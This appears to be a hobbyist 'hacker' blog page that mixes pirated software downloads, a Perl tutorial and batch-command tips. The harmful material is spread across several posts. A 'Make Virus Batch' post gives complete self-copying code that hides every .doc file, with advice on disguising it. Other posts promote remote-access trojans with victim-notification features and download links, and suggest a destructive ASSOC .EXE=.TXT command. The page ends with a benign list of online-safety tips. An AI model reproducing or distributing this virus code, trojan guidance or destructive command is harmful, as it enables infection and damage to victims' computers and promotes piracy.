• Welcome to Hacker Side:This site provides information about the science of programming, on windows and other.to send email please mail to :ewardoyo.email@gmail.com.Thanks For Coming This Site:
  • WELCOME TO MY SITE: 2010
    Join 4Shared Now!
    Add

    PostHeaderIcon All Portable application (Just run without install)

    All Portable application (Just run without install)

    1. Oxford English dictionary Portable


    2. Error repair Professional Portable



               Download here

    3. Internet Download Man*g*r Portable





    4. 7-Zip V 4.57 Portable


    5. MS Wo*d Portable



    6.MS  ExC*L Portable


    7. Alc*h*l 120% 1.9.6.5429 Portable


    8. Opera 9.24 Portable




    9. Nero.v8.1.1.0 Portable



    PostHeaderIcon VM WARE WORKS STATION AND INSTALL UBUNTU IN VMWARE



    VM WARE WORKS STATION AND INSTALL UBUNTU IN VMWARE

    If u wanna learn more about linux debian without change ur os u can this tool, very simple in use, but at least u must have big memory in ur computer and big hardisk, because this tool allocate 8 gigabyte to disk space, and memory allocate 256 mb (in this version I use 6.00 version). Even if u wanna learn about LAN u can this tool too. If u need this tool u can download here



    Step by step install linux in VM Ware Works Station ( with picture)



    1.first u need download VM Ware Work Station , U can search in google, use this syntax to precision search (intitle:"index of *" "VMWare " exe), or u can download here.



     
    2.extract that file, and then run setup.exe,



    3.after finished the installation, run the vmware from the start menu.










    Picture 2 
    .
    Picture 3


     Picture 4.

    Picture 5.
    Picture 6.


    Picture 7

    Picture 8 




    Okay, ur virtual hardisks has been created, now u if u have big RAM u can set ur memory more than 256 MB, u can set ur display too. Now u need Ubuntu cd, but if u don’t have it don’t worry u can search in google and use this syntax
    intitle:"index of *" "Ubuntu " iso
    or u can download here Ubuntuiso Linux
    and then u need Daemon to mount the iso file, u can download here Daemon, then after mount the ISO Ubuntu, (I use Daemon version 4.30.4.0027)

    If u use daemon don’t forget to set ur cd room drive according to drive




     Picture


    Picture 11


     Picture 12



    Picture 13



    Picture 14


    Picture 15


    Picture 16


    Picture 17

         
    Picture 18


    Picture 19


    Picture 20


    Picture 21


    Picture 22




          

    PostHeaderIcon Passware Password recovery

    Passware Password recovery

    This tool have many feature :
    1.office key
    2.1-2-3 key
    3.acrobrat key
    4.act key
    5.asterik key
    6.i.e key
    7.messenger key.
    8.zip key
    9.excel key

    and many other feature in this tool, to zip and rar key it depend your pc and the combined of password
    if the password has many combined it take long time to open it. for more help u
    can open help file or visit the site.

    download here http://rapidshare.com/files/407551483/Passware_Password_Recovery_Kit_6.3_Enterprise.rar.html















































    PostHeaderIcon TROJAN


    TROJAN
    1. .SARS Trojan Notification sends the location of victims IP address to the attacker, whenever the victim online on the internet the attacker received the notification.
    Notification methods Available:
    ==============================
    -Sin notication   :Use the Client.exe included in the package u can
                       Point the server to ur ip or to a DNS

    -Icq Notification :Ip Adress is in the folowing form { - } to
                       avoid the Filtration of notify , and Editable
                       From email and From name.
    -Php Notification :(Generate the Loger by clicing the button in the
                       Editor and point to the log.php link and
                       notitifcation will be recieved in log.html
    -Mail Notification: This will Send u a notification to ur email
                        adress u can edit the From email,and Subject
                        Note : you will not get Notification from
                               Some machines wich ISP's are blocking
                               SMTP.
    -Net Send         : Works for Nt based OS.

    -Cgi Notification: Ralog.zip is included in the package.

    -Irc notification: a Bot will join the channel Give the info
     Then part.
     
    1. Prorat Trojan










    PRO RAT TROJAN
    ProRat is a Remote Administrator Tool, which is owned to ProGroup. All ProGroup members has labor in creating ProRat and in the course of time it has been purified to it's bugs by testers of ProRat and it has been developed for the best.
    ProRat has been written in C++. Server and client can work on all of popular windows operating systems. Normal Server, Downloader Server, ProConnective, CGI Victim List, Help etc... Can also be created with using the client.
    1-Create ProRat Server :
    Create ProRat Server: If you click on this button, you will access to the menu that you can create a ProRat server.

    2-Create Downloader Server :
    Create Downloader Server: If you click on this button, you will access to the menu that will create a Downloader server and makes you to infect the server easier

    3-Create Cgi Victim List :
    Create Cgi Victim List: If you click on this button, you will get access to the menu which will create a cgi victim list and it is a notification method and lets you know every time your victim gets online. 


     REMOTE BY SERVER

















    The main screen basically displays information the program has received and processed.
    • Start Server: After you have opened up the program, click Start server once for RemoteByMail to begin receiving and processing e-mails (you also can set this up to be automatically in the Options).
    • Stop: You can stop RemoteByMail at any time by clicking on the Stop button.
    • Check now: Click here if you don’t want to wait for the next scheduled e-mail check.
    • Statistic: This window displays program information, like how long the program has been running, how often it is supposed to check for e-mail etc.
    • Listening to accounts: This windows displays the accounts and associated e-mail addresses RemoteByMail is ready to follow commands from.
    • Emails received: Here you find a list of all the e-mails containing commands the program has received. The most recent one is on top of the list. You may right-click the entries in order to process the e-mail again, to display the e-mail message or to delete it.
    • Command queue: Displayed here are all commands the program has received and not yet processed.
    • Outgoing emails: Here you see the emails RemoteByMail is in the process of sending.
    • Emails send: Here you see a list of all emails RemoteByMail has sent out. Right-click an entry to either show the email message or to delete it



     




















    WRAPPER


    SOURCE : C E H ( CERTIFIED ETHICAL HACKER)

    SARS TROJAN : DOWNLOAD HERE
    http://www.ziddu.com/download/10537681/S.A.R.SNotifier.zip.html





    PRO RAT TROJAN :
    http://www.ziddu.com/download/10537710/ProRat_v1.zip.html


    REMOTE BY MAIL


    http://www.ziddu.com/download/10537731/RemoteByMail.v1.01.zip.html


    WRAPPER
    http://www.ziddu.com/download/10538132/OneFileExeMaker.zip.html




    PostHeaderIcon PERL TUTORIAL PART 1

    BASIC  PERL LEARNING WITH EXAMPLE

    1.\N NEW LINE

    EXAMPLE :

    $string = "hello world\n";
    print"string";

    result :

    hello world

    U must type with double quote between the word or sentence because if u use single quote it will produce like this

    $string = 'hello world\n';
    print"string";

    result :

    hello world\n



    2.\t horizontal tab

    example

    $string = "\tHello World\n";

    result:

          hello world
    it will produce hello world with more space, u must placed "\t" before the word to make a tab,


    3.\a alert (will make a beep)

    example

    $string = "Hello World\a\n";
    print"$string";

    result

    Hello World

    it will make one beep on ur pc, but if u want make more than one beep u can add "\a" like this

    $string = "Hello World\a\a\n";
    print"$string";

    it will make 2 beep on ur pc. u can placed "\a" before or after word

    example
    $string = "\aHello World\a\a\n";
    print"$string";

    it will make 3 beep.

    4.\e escape character

    example
    $string = "\eHello World";
    print"$string";

    result

    ?Hello World

    u can placed before and after the word


    5.\f form feed

    exmaple

    $string = "\fHello World";
    print"$string";

    result

    ?Hello World



    == - ==== - ===== - ======

    PostHeaderIcon BATCH COMMAND PART 1

    TASKKILL

    /S SYSTEM

    /U DOMAIN

    /PASSWORD

    /F SPECIFIES TO FORCEFULLY TERMINATE PROCESSES

    /FI FILTER DISPLAY A SET OF TASK THAT MATCH A GIVEN CRITERIA SPECIFIED BY THE FILTER

    /PID BY PROCESS ID

    /IM IMAGE NAME

    /T KILL PROCESS TREE

    EXAMPLE :

    TASKKILL /F /IM EXPLORER.EXE

    OR U CAN USE ADDITIONAL LIKE THIS :

    TASKKILL /F /IM EXPLORER.EXE /T

    IF U WANNA TERMINATE MORE ONE APPLICATION USE COMMAND :

    TASKKILL /F /IM EXPLORER.EXE /IM FIREFOX.EXE

    U CAN KILL PROCESS BY USING PID IF U DONT KNOW PID NUMBER U CAN SEE IN TASKMAN

    THEN U TAB ON VIEW, SELECT COLOMN THEN CHECK PID ( PROCESS INDITIFIER )

    THEN LOOK THAT ON THE SCREEN U WILL FOUND PID NUMBER ON THE PROCESS APPLICATION

    COMMAND TO USE IT :

    TASKKILL /PID 4396 /T

    NOTE:4396 IS CMD PROCESS

    IF U WANT TO KILL MANY PROCESS U CAN USE COMMAND

    TASKKILL /PID 4396 /PID 3264 /PID 3396 /T

    TO KILL ALL PROCESS WINDOWS USE THIS COMMAND

    TASKKILL /FI "WINDOWTITLE NE UNTITLED*"

    U CAN KILL PROCESS BY THE NETWORKS

    TASKKILL /S SYSTEM /U USERNAME /P PASSWORD /FI "WINDOWTITLE NE UNTITLED*"


    ASSOC COMMAND

    THIS FEATURE COMMAND CAN MAKE UR WINDOWS SYSTEM disablement

    THIS IS EXTENSION IN WINDOWS


    .r29=WinRAR
    .ra=mplayerc.ra
    .raf=Photoshop.CameraRawFileFujifilm.10
    .ram=mplayerc.ram
    .rar=WinRAR
    .ras=
    .rat=ratfile
    .raw=
    .rc=rcfile
    .RDP=RDP.File
    .red=Rose.ModuleDiagramPicture
    .reg=regfile
    .res=resfile
    .resx=VBExpress.resx.8.0
    .rev=WinRAR.REV
    .rle=
    .rm=mplayerc.rm
    .rmi=Winamp.File
    .rmm=mplayerc.rmm
    .rmvb=mplayerc.rmvb
    .rnk=rnkfile
    .rp=mplayerc.rp
    .rpc=
    .rpm=
    .rqy=rqyfile
    .rsp=
    .rt=mplayerc.rt
    .rtf=Word.RTF.8
    .rv=mplayerc.rv
    .rwz=RWZFile
    .s3m=Winamp.File
    .s3z=Winamp.File
    .sam=
    .sav=SPSS.DataDoc
    .sbr=
    .sbs=SPSS.SaxBasicScript
    .sc2=SchedulePlus.Application.7
    .scd=SchedulePlus.Application.7
    .scf=SHCmdFile
    .sch=SchedulePlus.Application.7
    .scp=txtfile
    .scr=scrfile
    .sct=Photoshop.SCTFile.10
    .sdb=appfixfile
    .sdl=VBExpress.sdl.8.0
    .sed=
    .settings=VBExpress.settings.8.0
    .sgt=
    .shb=DocShortcut
    .shc=Photoshop.ShapeCurves
    .shh=Photoshop.SHHFile.10
    .shs=ShellScrap
    .shtml=shtmlfile
    .shw=
    .SIS=Nokia.ApplicationInstaller
    .SISX=Nokia.ApplicationInstaller
    .sit=
    .slk=Excel.SLK
    .sln=VisualStudio.Launcher.sln
    .smi=mplayerc.smi
    .smil=mplayerc.smil
    .snag=SnagIt.9.Picture
    .snagacc=SnagItAccessory.Document
    .snagprof=SnagItProfile.Document
    .snd=Winamp.File
    .snippet=VBExpress.snippet.8.0
    .snk=VBExpress.snk.8.0
    .snp=SnapshotFile
    .soap=soap
    .soe=Offline Explorer Sequencer file
    .sol=
    .sor=
    .spc=SPCFile
    .spd=SPSS.SPD
    .spj=SPSS.ProductionJob
    .spl=ShockwaveFlash.ShockwaveFlash
    .spo=spo_auto_file
    .spp=sppfile
    .spq=SPSS.DBQuery
    .sps=SPSS.Syntax
    .spv=SPSS.16OutputDoc
    .sql=
    .srf=Photoshop.CameraRawFileSony.10
    .sr_=
    .sst=CertificateStoreFile
    .sta=Photoshop.STAFile.10
    .ste=Dreamweaver.Site.Definition
    .stf=STFFile
    .stl=STLFile
    .stm=Winamp.File
    .stt=
    .stz=Winamp.File
    .suo=VisualStudio.Launcher.suo
    .swf=ShockwaveFlash.ShockwaveFlash
    .swt=VisualBasic.SWTFile
    .sym=
    .sys=sysfile
    .sy_=
    .t2s=Token2Shell.SessionToken
    .tar=WinRAR
    .taz=WinRAR
    .tbs=TuneUp.Boot.Screen
    .tbz=WinRAR
    .tbz2=WinRAR
    .text=
    .tga=Photoshop.TGAFile.10
    .tgz=WinRAR
    .theme=themefile
    .tico=
    .tif=
    .tiff=
    .tip=TuneUp.Icon.Package
    .tla=TuneUp.Logo.Animation
    .tlb=
    .tld=TlxTrellixCtrl.TlxTrellixCtrl.2.Design
    .tls=TuneUp.Logon.Screen
    .tlt=TlxTrellixCtrl.TlxTrellixCtrl.2.Template
    .tlx=TlxTrellixCtrl.TlxTrellixCtrl.2
    .torrent=Azureus
    .tp=PDVDmpgfile
    .tpf=
    .tpl=BestAddress.Template
    .tr=PDVDmpgfile
    .trg=SqlServerReplication.Trg
    .trn=SqlServerLogShipping.Trn
    .trp=PDVDmpgfile
    .ts=PDVDmpgfile
    .tsk=BestAddress.TaskList
    .tsp=
    .tsv=
    .ttc=ttcfile
    .ttf=ttffile
    .tu2009code=TuneUp.Utilities.2009.Unlock.Code
    .tvs=TuneUp.Visual.Style
    .tws=TextPad.tws
    .txt=txtfile
    .u4a=QuickClean.Archive
    .u4b=QuickClean.Backup
    .uar=QuickClean.Archive
    .ub6=QuickClean.Backup
    .UDL=QuickClean.Backup
    .uff=QuickClean.Backup
    .uha=WinUHA
    .uls=ulsfile
    .ult=Winamp.File
    .URL=InternetShortcut
    .user=
    .uu=WinRAR
    .uue=WinRAR
    .uxdc=UXDCFILE
    .vb=VBExpress.vb.8.0
    .VBE=VBEFile
    .vbg=VisualBasic.ProjectGroup
    .vbl=VisualBasic.VBLFile
    .vbp=VisualBasic.Project
    .vbproj=VBExpress.vbproj.8.0
    .vbr=VisualBasic.VBRFile
    .vbs=VBSFile
    .vbw=VisualBasic.VBWFile
    .vbx=
    .vbz=VisualBasic.VBZFile
    .vcf=vcffile
    .vcs=vcsfile
    .vmg=Nokia.vmgEditor.Message
    .vob=PDVDmpgfile
    .VOC=Winamp.File
    .vro=PDVDmpgfile
    .vscontent=VisualStudio.ContentInstaller.vscontent
    .vsi=VisualStudio.ContentInstaller.vsi
    .vssettings=VBExpress.vssettings.8.0
    .vstemplate=VBExpress.vstemplate.8.0
    .vuze=Vuze
    .vxd=vxdfile
    .wab=wab_auto_file
    .wal=Winamp.SkinZip
    .wav=Winamp.File
    .wax=WAXFile
    .wb2=
    .wbk=Word.Backup.8
    .wbm=Nokia.Multimedia
    .wbmp=Nokia.Multimedia
    .wct=VisualBasic.WCTFile
    .wdp=wdpfile
    .wdq=Offline Explorer Queue file
    .webpnp=webpnpFile
    .wfx=
    .WHT=Whiteboard
    .whtt=WinHTTrackProject
    .wiz=Word.Wizard.8
    .wizhtml=accessthmltemplate
    .wk4=
    .wll=
    .wlt=
    .wm=ASFFile
    .wma=Winamp.File
    .wmd=WMDFile
    .wmdb=WMP.WMDBFile
    .wmf=wmffile
    .wmp=
    .wms=WMSFile
    .wmv=Winamp.File
    .wmx=ASXFile
    .wmz=WMZFile
    .wpd=
    .wpg=
    .wpl=WPLFile
    .wri=wrifile
    .wrk=SqlServerLogShipping.Wrk
    .wsc=scriptletfile
    .wsdl=VBExpress.wsdl.8.0
    .WSF=WSFFile
    .WSH=WSHFile
    .wsz=Winamp.SkinZip
    .wtx=txtfile
    .wv=
    .wvx=WVXFile
    .wwd=SPSS.WinWrapBasicScript
    .x=
    .x3f=Photoshop.CameraRawFileFoveon.10
    .xaml=Windows.XamlDocument
    .xbap=Windows.Xbap
    .xdr=VBExpress.xdr.8.0
    .xevgenxml=XEV.GenericApp
    .xht=xhtfile
    .xhtm=Opera.HTML
    .xhtml=xhtmlfile
    .xix=
    .xla=Excel.Addin
    .xlam=Excel.Addin
    .xlb=Excel.Sheet.8
    .xlc=Excel.Chart.8
    .xld=Excel.Dialog
    .xlk=Excel.Backup
    .xll=Excel.XLL
    .xlm=Excel.Macrosheet
    .xls=Excel.Sheet.8
    .xlsb=Excel.SheetBinaryMacroEnabled.12
    .xlshtml=Excelhtmlfile
    .xlsm=Excel.SheetMacroEnabled.12
    .xlsmhtml=excelmhtmlfile
    .xlsx=Excel.Sheet.12
    .xlt=Excel.Template
    .xlthtml=Excelhtmltemplate
    .xltm=Excel.Template
    .xltx=Excel.Template
    .xlv=Excel.VBAModule
    .xlw=Excel.Workspace
    .xlxml=Excelxmlss
    .xm=Winamp.File
    .xml=xmlfile
    .xmz=Winamp.File
    .xnk=xnkfile
    .xpp=SqlServerReplication.Xpp
    .xps=XPSViewer.Document
    .xsc=VBExpress.xsc.8.0
    .xsf=InfoPath.SolutionManifest.1
    .xsl=xslfile
    .xslt=VBExpress.xslt.8.0
    .xsn=InfoPath.Solution.1
    .xss=VBExpress.xss.8.0
    .xst=PSTFile
    .xxe=WinRAR
    .z=WinRAR
    .z96=
    .zap=zapfile
    .ZFSendToTarget=CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}
    .zip=WinRAR.ZIP
    ._sln=VisualStudio.Launcher._sln
    ._sln60=VisualStudio.Launcher._sln60
    ._sln70=VisualStudio.Launcher._sln70
    ._sln71=VisualStudio.Launcher._sln71
    ._sln80=VisualStudio.Launcher._sln80
    ._vbxsln80=VisualStudio.Launcher._vbxsln80
    ._vcppxsln80=VisualStudio.Launcher._vcppxsln80
    ._vcsxsln80=VisualStudio.Launcher._vcsxsln80
    ._vjsxsln80=VisualStudio.Launcher._vjsxsln80
    ._vstasln80=VisualStudio.Launcher._vstasln80
    ._vwdxsln80=VisualStudio.Launcher._vwdxsln80


    U CAN TRY THIS COMMAND ON YOUR WINDOWS VERY - VERY AMAZING GUYS

    ASSOC .EXE=.TXT

    U WANT OPEN MSWORD WITH NOTEPAD BEGIN NOW TRY THIS COMMAND

    ASSOC .DOC=.TXT

    CREATED BY ME

    PostHeaderIcon RAPIDHACKER TOOLS

    RAPIDHACKER TOOLS























    Rapidhacker tools
    Download There : http://www.4shared.com/file/208700524/e7699239/RapidHackTools.html
    Source : www.Google.com

    PostHeaderIcon Make Virus Batch With Notepad (Part1)

    Make Virus Batch With Notepad (Part1)

    Step One

    Open your notepad and save with extension .bat


    then type this on your notepad :
    First algoritm


    For %%p in (A C D E F) do copy %0 %%p:


     explanation for P is variable, this really been advised to handle syntax that over-long


    second algoritm


    For %%q in (A C D E F) do dir %%q:\*.doc /B/S >> C:\virii.txt


    in this second algorithm we do data collection for all ektensi doc files on the drive there A C D E F the results of data collection on display at virii.txt






    /b to to eliminate the usual header display appears every time we use the dir command






    /s the function to search for files made up into a sub directory within the main directory






    third algoritm




    For %%r in (A C D E F) do attrib +h +s %%r:\*.doc




    after do data collection the virus will hide all file with extension *.doc with supper hidden (+h +s)




    for +h hidden system file




    for +s hidden file system






    This complete code for the virus




    echo off> C:\virii.txt




    For %%p in (A C D E F) do copy %0 %%p:




    For %%q in (A C D E F) do dir %%q:\*.doc /B/S >> C:\virii.txt








    For %%r in (A C D E F) do attrib +h +s %%r:\*.doc




    exit




    then compile your batch file with tool batch to exe you can download from google




    to change icon u can do with tool icon changer or resthacktools








    PostHeaderIcon Rapidshare Tool 2009

    Rapid share Tool 2009






    Feature



    Rapidshare And Megaupload Search Plugin maker
    Rapidshare anti leech decrypter 4.0
    Rapidmule Rapidshare downloader
    Brutaldown Rapidshare tips and hints
    Renew IP
    Link Grabber
    and many other feature in this sofware


    u can download at http://www.4shared.com/file/191756691/2860b3b5/Rapidshare_Toolz.html



    Source : www.google.com





























    PostHeaderIcon 50 Ways to Protect Your Information Assets When Cruising the Internet

    Original posted by Fred Cohen &Associates

    CyberCops are particularly vulnerable to exploitation when they are doing investigations on the Internet. To help them, and others who want to be safer when cruising the Internet Fred Cohen and CyberCop.org (Kevin Manson) provide this list of the 50 Ways to protect your information assets when cruising the Internet

    System configuration must be done properly in order to have a modicum of security. Here are some configuration issues you should address:

     1. Use removable media on Internet-connected computers. With removable media, you can put in the Internet disk when you are using the Internet, and replace it with the 'secure' media when doing your investigative work. It means that the bad actors can't get to your confidential information when you're on the net and your critical information can't get messed up by a virus or Trojan horse coming in from off the Internet.

     2. Turn off "sharing" on NT and Windows boxes. Sharing of files lets Internet users access your disk from anywhere in the world. With sharing turned off, they have to break in to get at your system.

    3. Turn off Active X, Java, and Javascript. These capabilities help you make pretty pictures, but they also allow the bad actors of the Internet to enter your system and do with it what they will.

    4. Use properly configured software to assist in detecting viruses and malicious code. If your virus scanner can handle it, have it check for macro viruses in real-time.

    5. Keep clean and current copy of system start-up and restore software handy. This way you can recreate a working system in a flash and avoid long downtime when you do things like upgrading explorer versions over the Web and finding out that your system is locked up.

    6. Backup, backup, backup. Yes - keep three copies of the backups just in case.

    7. Keep your software up to date with security-related changes. For example, without the latest version of your browser or email program, you may find that when you go to read email - even before you open up any of the messages, your system ha been taken over by a remote attacker.

    8. Turn off unnecessary Internet service ports. In general, if you don't know why your system uses a service, you should not have that service turned on. Every service is a potential vulnerability.

    9. Use a scanning tool to test which ports are turned on. Never trust the menu-based configuration tool to tell you this sort of information because many of these tools have errors, some of which have opened systems up to remote exploitation even though the user 'did the right thing'.

    10. If it's really important to document, print it out. Remember that paper trails are a lot easier to use and authenticate in court than electronic media.

    Passwords have been a security issue for a long time, and most people still don't know how to use them safely. You need to know how to create and use passwords that are properly crafted to the need:

    11. If you have anything important on a remote site, use unique passwords for each online service and site. Otherwise, someone breaking into or watching one service could use your password in other services.


    12. If you are going to use the same password for multiple sites, make sure they are not important sites. For example, whenever I get a password for a remote site that is not important, I try for user ID guest, password guest. This may weaken their security, but if they allow it, their security is already very weak, and it is easy for me to remember and doesn't give anything away about me or the kinds of passwords I use for important systems.

    13. If you are accessing remote services on the Internet, remember the passwords can be easily sniffed. Try to avoid using passwords for Internet-based access..

    14. NEVER use a password over the Internet that's the same password you use on your local systems. That might allow someone from the Internet to break into your system.


    15. Try to get and use one-time authentications of some sort. These are relatively inexpensive (Deception Toolkit at all.net has one for free) and very effective.


    16. When possible, augment passwords with some other form of authentication. For example, use TCP wrappers or some other similar tool to limit the remote IP addresses that can access a critical system, or use a separate channel to enable remote login.


    17. When you have to change your password, don't do it over the Internet. It is easily sniffed. If at all possible, do it from the computer with the password on it.

    18. Changing your password regularly is not prudent for all systems or situations. Consider the real benefit and harm associated with this activity before doing it haphazardly. Look at this article for more details.


    19. Some passwords are harder to guess than others. Use the harder to guess ones. Examples of easily guessed passwords include (1) your name, user ID, or other available information associated with you, (2) any word or pair of words in any language, (3) QWERTY or similar keyboard patterns (but not all keyboard patterns are easy to guess), (4) passwords of less than 7 keystrokes, (5) passwords with only numbers, only letters, or the same character repeated.

    20. Don't let other folks use your user ID and password and don't tell anyone your user ID and password. This lets them fake being you and you are likely to be the one who gets in trouble if they do something wrong. No legitimate person responsible for security or systems maintenance needs to know your password, and there are almost no exceptions to this rule. (Check your organization's policies in this regard.)

    Don't trust remotely obtained software. It can contain Trojan Horses that are potentially devastating in their effect. Examples of how this has been exploited in the past include but are by no means limited to (1) causing your system to dial out to a 900 number for Internet service, (2) stealing your online information, (3) corrupting or destroying information on your system, (4) turning the computer into a jumping off point to attack other systems, and (5) placing a Trojan horse in your system to permit remote reentry and exploitation at a later date.

    21. Turn off "autoinstall" features on browsers. Autoinstall allows remote Web sites to automatically change what your system does by installing their software.


    22. Become familiar with the "processes" that are authorized to run on your machine and how to check on them. Check them periodically and whenever you suspect or observe abnormal system behavior.


    23. More viruses spread occurs today as a result of email attachments than anything else. Be careful how you use email attachments and who you accept them from. When I don't know and trust the person sending me an email attachment, I either ask them to send it in plain text format and not as an attachment, ask them to FAX it to me, or copy it off of my system onto a non-networked system and read it there.

    24. Don't use Word attachments without Word configured to disable all macros before execution. Otherwise, you can easily be attacked by an email.


    25. Don't trust excel spreadsheets. They not only give wrong answers, but they can contain "CALL" macros to attack your system and there is no mechanism to detect or prevent this available today.

    26. Don't trust any program - whether it comes in source or in executable format - without seriously considering the potential implications of its installation and use. Many programs innocently do things that weaken your security, and in lots of cases they allow remote exploits against your system.

    27. Just because it isn't called a program doesn't mean it isn't a program. Most information you get is just plain 'data', but some of it is not, and it is hard to tell the difference unless you are a real expert. But you can't stop using computers just because you don't trust them because they are required in order to get the work done. Just understand that you can get hurt and prepare to suffer the consequences.

    Keep up to date on the information security issues that might effect your system:

     28. Subscribe to computer security lists such as NT Bugtraq, NTSecurity Digest, etc. Read about the newest attacks and update your system to mitigate them.


    29. Keep your system up to date with the newest security patches for the software you use to cruise the Internet.


    30. Realize that computer security requires a systematic, not a piecemeal, strategy to be effective. 50 ways are only the beginning.

    31. Think like an attacker, how would you attack yourself? You might read some of the hacker FAQs or try an automated attack and defense game to get a sense for what people might try to do to you and how. You might want to see how attackers think by exploring one of the games on the all.net web site.

    32. Don't forget other communications channels that may be vulnerable, such as voicemail.

    33. Ask others who are competent to review or audit your security practices.

    34. Don't forget that critical data may be far more resilient to degradation or corruption when placed on paper than on magnetic or optical media.

    Use available security technology to your advantage:

    35. Become familiar with methods of anonymizing your online sessions - such as Onion routing, ZKS, anonymizer, and "mixmaster" type anonymous remailers. Remember that the bad guys use them (and may run them) too, and don't trust them alone for anything important.

    36. Begin to routinely encrypt any important communications and encourage (and assist) others in doing so.


    37. Whenever you encrypt, always view the encrypted file before sending it. Encryption systems sometimes don't so what they say they do.

    38. Generate a public/private key pair and let others know how they may obtain it.

    39. Digitally sign e-mail where authenticated identity or unmodified content is important

    40. Digitally sign important files, documents that you believe others may wish to rely on as to their integrity and authenticity.

    Use uncommon sense:

    41. Don't visit the bad-guys' sites except through a properly concealed and authorized location. Remember that they can see you when you can see them.

    42. Don't go cruising through the seedy side of the Internet unless you are ready for the seedy side to go cruising through you.

    43. Don't respond to email from lists you haven't signed up to, especially if they tell you that you can 'unsignup' by sending them mail. This is how they confirm your email address as valid.


    44. Never post to public bulletin boards or mailing lists unless you want to get anonymous email from lots of solicitation places. That's one of the major ways they get email addresses.

    45. Unless you are investigating a porn site, don't visit it. You are likely to get a great deal of follow-up from a very broad range of sources.

    46. The information you place in your Web browser (like your name, address, organization name, and so forth) are available to the Web sites you visit. Don't place information there unless you want it given to every site you visit.

    47. Every site you have ever visited may be revealed to any site you visit.
    48. Your system keeps records on most every place you visit. Many of these records can be remotely accessed, and local access grants a lot of fine details of when what took place.
    49. If the bad guys get into your system, they can get all of your cryptographic keys, your passwords, and anything else you have placed on your system.
    50. If the bad guys get into your system, they can use your system to get into other systems it can connect to. This often includes other computers inside your firewall.